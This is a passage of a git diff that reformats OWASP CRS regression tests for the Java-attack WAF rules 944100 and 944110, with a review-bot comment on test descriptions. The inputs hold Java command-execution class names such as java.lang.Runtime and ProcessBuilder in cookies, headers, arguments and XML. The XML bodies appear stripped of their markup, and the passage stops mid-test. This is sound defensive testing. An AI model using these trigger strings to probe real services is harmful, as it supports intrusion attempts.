User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-7 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - uri: "/post" - version: 
HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - 
Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - 
Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: 
gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index ca0eef8c9..7cf19d15c 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml 
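Review bot: Tests 11, 12, 15 and 16 are negative cases (`no_expect_ids: [944100]`) whose `desc` reads exactly like the positive ones ("XML element includes keywords java.lang.Runtime"), so the expected outcome is only recoverable from the assertion; each negative desc should state it, e.g. `desc: "XML element name includes keyword java.lang.Runtime - no match expected"`. Tests 2 through 10 also switch from `Content-Type: "application/x-www-form-urlencoded"` (test 1) to `"text/plain"` while still posting `key=value` bodies; since 944000's own desc describes text/plain as a type with no body processor, a comment above test 2 stating that these tests deliberately exercise the text/plain body path would stop a future maintainer from "correcting" the Content-Type and silently changing what is covered.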
@@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944110.yaml" - description: "Description" +rule_id: 944110 tests: - - test_title: 944110-1 + - test_id: 1 desc: Argument test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 2 desc: Argument test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - test_title: 944110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log: + expect_ids: [944110] + - test_id: 3 desc: Argument name includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log: + expect_ids: [944110] + - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log: + expect_ids: [944110] + - test_id: 5 desc: Cookie test includes keywords 
java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 6 desc: Cookie test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 7 desc: Cookie name includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 8 desc: Cookie name includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 9 desc: Request header test includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 10 desc: Request header test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 11 desc: XML element includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 13 desc: XML attribute value includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 15 desc: XML element includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 